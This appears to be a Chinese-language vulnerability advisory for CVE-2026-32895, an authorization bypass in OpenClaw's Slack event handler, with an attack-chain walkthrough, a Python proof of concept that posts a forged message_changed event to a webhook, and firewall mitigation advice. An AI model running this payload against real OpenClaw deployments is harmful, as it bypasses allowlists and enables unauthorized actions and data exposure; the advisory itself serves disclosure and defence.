CVE-2026-32895 CVSS 5.4 中危

CVE-2026-32895 OpenClaw发送方授权绕过漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32895

漏洞类型

权限绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.2.26之前的版本中存在发送方授权绕过漏洞。由于成员和消息子类型系统事件处理程序未能正确执行发送方权限验证，导致未经授权的事件可被排队。攻击者可利用message_changed等特定系统事件，绕过Slack直接消息白名单及频道用户白名单限制，从而在低权限下执行未授权操作。

技术细节

该漏洞源于OpenClaw在处理Slack事件回调时的逻辑缺陷。当系统接收到成员变更或消息子类型事件（如message_changed、message_deleted、thread_broadcast）时，代码路径中缺少对事件发送者身份的授权检查机制。攻击者只需具备低权限账户，即可构造包含上述事件类型的恶意Payload发送至OpenClaw接口。由于未验证发送者是否在预定义的白名单中，系统会错误地将这些非授权事件视为合法请求并加入处理队列。这使得攻击者能够绕过基于用户身份的访问控制策略（ACL），模拟合法用户操作或访问受限频道数据，导致数据泄露或完整性受损。

攻击链分析

STEP 1

侦察与枚举

攻击者识别出目标正在使用OpenClaw，并确定其版本低于2026.2.26。

STEP 2

构造恶意载荷

攻击者构造一个包含特定系统事件类型（如message_changed）的Slack事件Payload，并在其中指定一个不在白名单中的User ID。

STEP 3

发送伪造请求

攻击者通过低权限账户或直接调用API，将该伪造的事件Payload发送给OpenClaw的Webhook处理端点。

STEP 4

绕过授权检查

OpenClaw接收到事件后，由于漏洞未对发送者进行授权验证，直接将事件放入处理队列，绕过了Slack DM和频道白名单限制。

STEP 5

执行未授权操作

系统执行该事件对应的逻辑，导致非白名单用户成功触发了本应受限的操作，造成数据泄露或篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-32895: OpenClaw Sender Authorization Bypass
# Description: Send a crafted system event to bypass allowlists.

import requests
import json

target_url = "http://target-openclaw-instance/slack/events"

# Malicious payload simulating a message_changed event from a non-allowlisted sender
payload = {
    "type": "event_callback",
    "event": {
        "type": "message_changed",
        "channel": "C12345678",
        "message": {
            "text": "Bypassed authorization check",
            "user": "U_NON_ALLOWLISTED_USER", 
            "ts": "1234567890.123456"
        },
        "previous_message": {
            "text": "Old message"
        },
        "ts": "1234567890.123456"
    },
    "team_id": "T12345678"
}

headers = {
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Event likely enqueued.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

OpenClaw < 2026.2.26

防御指南

临时缓解措施

如果无法立即升级，建议在OpenClaw前部署Web应用防火墙（WAF），配置规则以拦截包含特定事件类型（如message_changed、message_deleted、thread_broadcast）且来源异常的请求。同时，严格监控日志，检测非白名单用户触发的系统事件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表